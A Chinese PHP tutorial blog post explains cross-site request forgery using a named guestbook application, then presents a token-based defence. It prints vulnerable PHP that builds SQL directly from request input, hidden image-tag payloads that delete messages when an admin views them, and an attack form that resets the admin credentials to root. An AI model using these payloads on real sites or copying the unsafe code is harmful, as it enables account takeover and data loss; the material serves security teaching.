php漏洞之跨网站请求伪造与防止伪造方法


Posted in PHP onAugust 15, 2013

伪造跨站请求介绍
伪造跨站请求比较难以防范,而且危害巨大,攻击者可以通过这种方式恶作剧,发spam信息,删除数据等等。这种攻击常见的表现形式有:

伪造链接,引诱用户点击,或是让用户在不知情的情况下访问

伪造表单,引诱用户提交。表单可以是隐藏的,用图片或链接的形式伪装。

比较常见而且也很廉价的防范手段是在所有可能涉及用户写操作的表单中加入一个随机且变换频繁的字符串,然后在处理表单的时候对这个字符串进行检查。这个随机字符串如果和当前用户身份相关联的话,那么攻击者伪造请求会比较麻烦。
如果攻击者以隐藏的方式发送给目标用户链接
<img src="/buy.php?item=watch&num=1000"/>,那么如果目标用户不小心访问以后,购买的数量就成了1000个
实例
随缘网络PHP留言板V1.0

任意删除留言
//delbook.php 此页面用于删除留言
<?php
include_once("dlyz.php");    //dlyz.php用户验证权限,当权限是admin的时候方可删除留言
include_once("../conn.php");
$del=$_GET["del"];
$id=$_GET["id"];
if ($del=="data")
{
$ID_Dele= implode(",",$_POST['adid']);
$sql="delete from book where id in (".$ID_Dele.")";
mysql_query($sql);
}
else
{
$sql="delete from book where id=".$id; //传递要删除的留言ID
mysql_query($sql);
}
mysql_close($conn);
echo "<script language='javascript'>"; 
echo "alert('删除成功!');";
echo " location='book.php';"; 
echo "</script>";
?>

当我们具有admin权限,提交http://localhost/manage/delbook.php?id=2 时,就会删除id为2的留言
利用方法:
我们使用普通用户留言(源代码方式),内容为
<img src="delbook.php?id=2" />
<img src="delbook.php?id=3" />
<img src="delbook.php?id=4" />
<img src="delbook.php?id=5" />

插入4张图片链接分别删除4个id留言,然后我们返回首页浏览看,没有什么变化。。图片显示不了
现在我们再用管理员账号登陆后,来刷新首页,会发现留言就剩一条,其他在图片链接中指定的ID号的留言,全部都被删除。
攻击者在留言中插入隐藏的图片链接,此链接具有删除留言的作用,而攻击者自己访问这些图片链接的时候,是不具有权限的,所以看不到任何效果,但是当管理员登陆后,查看此留言,就会执行隐藏的链接,而他的权限又是足够大的,从而这些留言就被删除了
修改管理员密码
//pass.php
if($_GET["act"])
{
$username=$_POST["username"];
$sh=$_POST["sh"];
$gg=$_POST["gg"];
$title=$_POST["title"];
$copyright=$_POST["copyright"]."<br/>网站:<a href=https://3water.com>三水点靠木</a>";
$password=md5($_POST["password"]);
if(empty($_POST["password"]))
{
$sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
}
else
{
$sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
}
mysql_query($sql);
mysql_close($conn);
echo "<script language='javascript'>"; 
echo "alert('修改成功!');";
echo " location='pass.php';"; 
echo "</script>";
}
这个文件用于修改管理密码和网站设置的一些信息,我们可以直接构造如下表单:
<body>
<form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1">
<input type="radio" value="1"  name="sh">
<input type="radio" name="sh" checked value="0"> 
<input type="text" name="username" value="root">
<input type="password" name="password" value="root"> 
<input type="text"  name="title"  value="随缘网络PHP留言板V1.0(带审核功能)" >
<textarea  name="gg"  rows="6" cols="80" >欢迎您安装使用随缘网络PHP留言板V1.0(带审核功能)!</textarea>
<textarea  name="copyright"  rows="6" cols="80" >随缘网络PHP留言本V1.0  版权所有:厦门随缘网络科技 2005-2009<br/>承接网站建设及系统定制 提供优惠主机域名</textarea>
</form>
</body>

存为attack.html,放到自己网站上https://3water.com此页面访问后会自动向目标程序的pass.php提交参数,用户名修改为root,密码修改为root,然后我们去留言板发一条留言,隐藏这个链接,管理访问以后,他的用户名和密码全部修改成了root
防止伪造跨站请求
yahoo对付伪造跨站请求的办法是在表单里加入一个叫.crumb的随机串;而facebook也有类似的解决办法,它的表单里常常会有post_form_id和fb_dtsg。
随机串代码实现
咱们按照这个思路,山寨一个crumb的实现,代码如下:
<?php 
class Crumb { 
CONST SALT = "your-secret-salt"; 
static $ttl = 7200; 
static public function challenge($data) { 
return hash_hmac('md5', $data, self::SALT); 
} 
static public function issueCrumb($uid, $action = -1) { 
$i = ceil(time() / self::$ttl); 
return substr(self::challenge($i . $action . $uid), -12, 10); 
} 
static public function verifyCrumb($uid, $crumb, $action = -1) { 
$i = ceil(time() / self::$ttl); 
if(substr(self::challenge($i . $action . $uid), -12, 10) == $crumb || 
substr(self::challenge(($i - 1) . $action . $uid), -12, 10) == $crumb) 
return true; 
return false; 
} 
}

代码中的$uid表示用户唯一标识,而$ttl表示这个随机串的有效时间。

应用示例

构造表单

在表单中插入一个隐藏的随机串crumb

<form method="post" action="demo.php"> 
<input type="hidden" name="crumb" value="<?php echo Crumb::issueCrumb($uid)?>"> 
<input type="text" name="content"> 
<input type="submit"> 
</form>

处理表单 demo.php

对crumb进行检查

<?php 
if(Crumb::verifyCrumb($uid, $_POST['crumb'])) { 
//按照正常流程处理表单 
} else { 
//crumb校验失败,错误提示流程 
} 
?>
PHP 相关文章推荐
用PHP实现登陆验证码(类似条行码状)
Oct 09 PHP
PHP 小心urldecode引发的SQL注入漏洞
Oct 27 PHP
解析php session_set_save_handler 函数的用法(mysql)
Jun 29 PHP
php解析url的三个示例
Jan 20 PHP
php实现简单文件下载的方法
Jan 30 PHP
php数组随机排序实现方法
Jun 13 PHP
PHP获取音频文件的相关信息
Jun 22 PHP
分享10段PHP常用代码
Nov 11 PHP
学习php设计模式 php实现建造者模式
Dec 07 PHP
PHP7正式版测试,性能惊艳!
Dec 08 PHP
自制PHP框架之路由与控制器
May 07 PHP
php操作redis命令及代码实例大全
Nov 19 PHP
PHP Global定义全局变量使用说明
Aug 15 #PHP
php生成图形验证码几种方法小结
Aug 15 #PHP
PHP中将ip地址转成十进制数的两种实用方法
Aug 15 #PHP
PHP怎么实现网站保存快捷方式方便用户随时浏览
Aug 15 #PHP
php正则取img标记中任意属性(正则替换去掉或改变图片img标记中的任意属性)
Aug 13 #PHP
php使用sql数据库 获取字段问题介绍
Aug 12 #PHP
完美解决PHP中的Cannot modify header information 问题
Aug 12 #PHP
You might like
PHP 文本文章分页代码 按标记或长度(不涉及数据库)
2012/06/07 PHP
php结合ajax实现赞、顶、踩功能实例
2014/05/12 PHP
PHP从FLV文件获取视频预览图的方法
2015/03/12 PHP
Thinkphp5框架使用validate实现验证功能的方法
2019/08/27 PHP
简略说明Javascript中的= =(等于)与= = =(全等于)区别
2013/04/16 Javascript
利用js的Node遍历找到repeater的一个字段实例介绍
2013/04/25 Javascript
CSS3,HTML5和jQuery搜索框集锦
2014/12/02 Javascript
使用JavaScript刷新网页的方法
2015/06/04 Javascript
jQuery的事件委托实例分析
2015/07/15 Javascript
js 上传文件预览的简单实例
2016/08/16 Javascript
浅谈layer的iframe弹窗给里面的标签赋值的问题
2016/11/10 Javascript
最全的JavaScript开发工具列表 总有一款适合你
2017/06/29 Javascript
详解开源的JavaScript插件化框架MinimaJS
2017/10/26 Javascript
nodejs中request库使用HTTPS代理的方法
2019/04/30 NodeJs
微信小程序云开发之使用云存储
2019/05/17 Javascript
浅谈Vue组件单元测试究竟测试什么
2020/02/05 Javascript
[01:07:02]DOTA2-DPC中国联赛 正赛 iG vs PSG.LGD BO3 第三场 2月26日
2021/03/11 DOTA
Python的多态性实例分析
2015/07/07 Python
使用Python读写及压缩和解压缩文件的示例
2016/07/08 Python
批量获取及验证HTTP代理的Python脚本
2017/04/23 Python
基于scrapy的redis安装和配置方法
2018/06/13 Python
python调用opencv实现猫脸检测功能
2019/01/15 Python
Python基于QQ邮箱实现SSL发送
2020/04/26 Python
TensorFlow实现模型断点训练,checkpoint模型载入方式
2020/05/26 Python
python线程优先级队列知识点总结
2021/02/28 Python
周仰杰(JIMMY CHOO)法国官方网站:闻名世界的鞋子品牌
2019/09/27 全球购物
什么是用户模式(User Mode)与内核模式(Kernel Mode) ?
2014/07/21 面试题
原料仓管员岗位职责
2014/04/12 职场文书
个人安全生产责任书
2014/07/28 职场文书
网络工程专业大学生求职信
2014/10/01 职场文书
2014学生会工作总结报告
2014/12/02 职场文书
课外活动实习计划
2015/01/19 职场文书
导游词之黄帝陵景区
2019/09/16 职场文书
PHP判断是否是json字符串
2021/04/01 PHP
golang import自定义包方式
2021/04/29 Golang
SQL实现LeetCode(175.联合两表)
2021/08/04 MySQL